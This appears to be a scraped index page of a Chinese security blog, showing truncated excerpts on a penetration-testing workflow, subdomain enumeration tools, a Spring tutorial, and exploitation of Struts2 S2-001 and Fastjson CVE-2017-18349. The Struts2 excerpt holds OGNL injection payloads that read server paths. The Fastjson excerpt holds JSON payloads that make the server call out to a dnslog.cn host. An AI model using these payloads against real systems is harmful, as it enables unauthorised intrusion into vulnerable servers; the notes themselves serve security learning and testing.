渗透测试
记录一下渗透测试全流程,快速成为脚本小子。不定期更新。
信息收集 info collectWeb信息收集E:\att_tools\info collect\webinfo_collect
网站查询
网络空间测绘Shodan
FOFA
FofaViewer_1.1.11
子域名查询、DNS记录查询subDomainBrute
1python .\subDomainsBrute.py xx.com
特点是可以用小字典递归的发现三级域名、四级域名、甚至五级域名等不容易被探测到的域名。
OneForAll
https://github.com/shmilylty/OneForAll
12python oneforall.py --target example.com runpython oneforall.py --targets ./example.txt run
是在域名系统等级中,属于更高一层域的域。比如,mail.example.com和calendar.example.com是example.com的两个子域,而example.com则是顶级域.com的子域。
ksubdom ...
应用安全
c157c9744e0298d00173c08a9dbffe0e012a66921de701e04ff6241a7c20ca27b1db67450a2fc68cf5ae48218b25410a32d72cafb91aeb47f3a716125c51d1c1610309b077c99677ebc88a439f9780e57f4542f149fcbbdf42fd27671954c24b325d1cfc2efb86effe0347015b1d518b7315bf7e29f3bd8e0b684c630a96b518edbcff4b0def9a53845654fda43bb7df7b7956ce0c6ba60d695d85b43f17b3af123d40acaa0dac97b908195ce3a132ab458b2b6ba18b5c90f685916419dd1ab01a4283bcc0d457bfad1386680049123aa3811d14a6804c03e5942408b31df0748879a728649c5cb7f76c35694d3a08a36d5beaadc09fffb71 ...
test
测试文件
1111111111111
Spring学习
创建Maven聚合工程入门案例开发步骤创建父工程 spring6
子模块 spring-first
第一步,引入spring相关依赖
12345678910<dependency> <groupId>org.springframework</groupId> <artifactId>spring-context</artifactId> <version>6.0.2</version></dependency><dependency> <groupId>org.junit.jupiter</groupId> <artifactId>junit-jupiter-api</artifactId> <version>5.3.1</version></dependency>
第二步,创建类,定义属性和方法
123456public class User { ...
Struts2
S2-001影响范围官方公告:https://cwiki.apache.org/confluence/display/WW/S2-001
漏洞影响范围:WebWork 2.2.0-WebWork 2.2.5,Struts 2.0.0-Struts 2.0.8
检测1%{1+1}
利用获取tomcat路径
1%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
获取web目录
1%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath(' ...
Fastjson漏洞利用
CVE-2017-18349(RCE)影响范围:fastjson < 1.2.25
检测方法
1.GET方法改成POST方法
2.添加或修改Content-Type:application/json
12{"tN":{"@type":"java.net.InetSocketAddress"{"address":,"val":"7lxpfc.dnslog.cn"}}}
3.union编码(不一定)
12{"tN":{"\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006e\u0065\u0074\u002e\u0049\u006e\u0065\u0074\u0053\u006f\u0063\u006b\u0065\u0074\u0041\u0064\u ...